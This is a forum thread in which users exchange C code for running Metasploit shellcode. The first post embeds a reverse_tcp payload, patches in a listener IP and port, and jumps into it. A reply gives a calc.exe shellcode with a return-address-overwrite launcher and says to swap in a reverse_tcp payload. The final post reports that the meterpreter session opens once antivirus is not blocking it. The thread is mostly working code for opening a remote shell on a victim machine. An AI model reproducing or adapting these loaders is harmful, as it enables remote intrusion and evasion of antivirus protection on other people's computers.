Results 1 to 3 of 3

Thread: Running metasploit payload in C/C++ app

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    3

    Default Running metasploit payload in C/C++ app

    Hello!

    I want to execute a metasploit reverse_tcp payload from my C code, but I don't know fully how to make it work properly. Here is the sample code I use to test it:

    Code:
    // reverse_tcp.cpp : Defines the entry point for the console application.
    //
    
    #include "stdafx.h"
    
    unsigned char payload[] =
    "\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
    "\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
    "\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
    "\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
    "\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
    "\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
    "\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
    "\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x43\x53\x43\x53\x89"
    "\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66"
    "\xb9\xa8\x6f\xff\xd6\x97\x68\xc0\xa8\x01\x0a\x66\x68\x11\x5c"
    "\x66\x53\x89\xe3\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50"
    "\xb4\x0c\x50\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6";
    
    int main(int argc, char* argv[])
    {
    	char ip[] = { 192, 168, 1, 213 };
    	char port[] = { 0x11, 0x5C };
    
    	memcpy( payload + 142, ip, 4 );
    	memcpy( payload + 148, port, 2 );
    
    	_asm {
    		lea eax, payload
    			call eax
    }
    
    	printf( "started.\n" );
    	while(1)
    	{
    		Sleep(100);
    	}
    
    	return 0;
    }
    That code will raise an exception that it can't read address 0xffffffff. I tried using try-catch blocks and it made it not crash, but anyway Metasploit multi/handler gets stuck on "Upload completed" (I want to use meterpreter payload for uploading) and nothing happens after that. __try-__except blocks also didn't do the trick. The session will open when I exit the program, but it will close immediatelly afterwards.
    Probably you know much better how to call the payload properly in C code to make it work properly.

    Regards,
    Black Dot

  2. #2
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Default

    This C code should work, the payload here is (windows/exec CMD=calc.exe EXITFUNC=thread) encoded with the generic msf encoder.
    Code:
    unsigned char shellcode[] = 
    "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef"
    "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31"
    "\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b"
    "\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
    "\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f"
    "\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad"
    "\x8b\x68\x08\x89\xf8\x83\xc0\x6a\x50\x68\xef\xce\xe0\x60\x68"
    "\x98\xfe\x8a\x0e\x57\xff\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65"
    "\x00\x0a";
    
    int main()
    {
      int *ret;
      ret = (int *)&ret + 2;
      (*ret) = (int)shellcode;
    }
    I use the command line compiler included with MS Visual Studio for windoze and gcc for linux. Works fine. Just replace the shellcode with your reverse_tcp payload generated with msfpayload | msfencode.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  3. #3
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    3

    Default

    Thanks for the suggestion with overwriting the return address, but it still crashes on trying to read 0xFFFFFFFF. The payload executes fine and it sends back the meterpreter stager from metasploit on my other laptop, but it just won't open the session. The target app crashes and metasploit gets stuck on "Upload completed.".

    Calc shellcode will run fine, but it seems it's just meterpreter reverse_tcp payload that is having a problem.

    EDIT: Ok, sorry, my problem was caused by Kaspersky who is probably protecting the computer from putting metsrv.dll into system32 directory. I checked on my desktop with ZoneAlarm installed and it works like a charm.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •